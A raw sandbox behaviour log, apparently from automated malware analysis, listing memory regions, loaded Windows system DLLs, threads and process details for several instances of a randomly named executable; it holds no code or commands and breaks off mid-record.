Region: id = 6738 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6739 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6740 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6741 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6742 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6743 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6744 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6745 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6746 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6747 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7128 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 7129 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7130 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7131 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7132 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7133 start_va = 0x4a0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 7134 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7135 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7136 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7137 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7138 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7139 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 7140 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7141 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7492 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 7493 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 7494 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7495 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7496 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7497 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7498 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7499 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7500 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7501 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7502 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7503 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7504 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7505 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7506 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7507 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7508 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7509 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7510 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7511 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7793 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7794 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7795 start_va = 0x7c0000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 7796 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 248 os_tid = 0x5a4 Thread: id = 278 os_tid = 0x1064 Process: id = "84" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x1d807000" os_pid = "0x1084" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6756 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6757 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6758 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6759 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6760 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6761 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6762 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6763 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6764 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6765 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6766 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6767 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6768 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6769 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6770 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6771 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7142 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 7143 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7144 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7145 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7146 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7147 start_va = 0x5a0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 7148 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7149 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7150 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7151 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7152 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7153 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7154 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7155 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7156 start_va = 0x5a0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 7157 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 7158 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7512 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7513 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7514 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7515 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7516 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7517 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7518 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7519 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7520 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7521 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7522 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7523 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7524 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7525 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7526 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7527 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7528 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7797 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7798 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7799 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 7800 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 249 os_tid = 0x7a4 Thread: id = 268 os_tid = 0xa6c Process: id = "85" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb50c000" os_pid = "0xe58" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6793 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6794 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6795 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6796 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6797 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6798 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6799 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6800 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6801 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6802 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6803 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6804 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6805 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6806 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6807 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6808 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7197 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7198 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7199 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7200 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7201 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7202 start_va = 0x480000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 7203 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7204 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7205 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7206 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 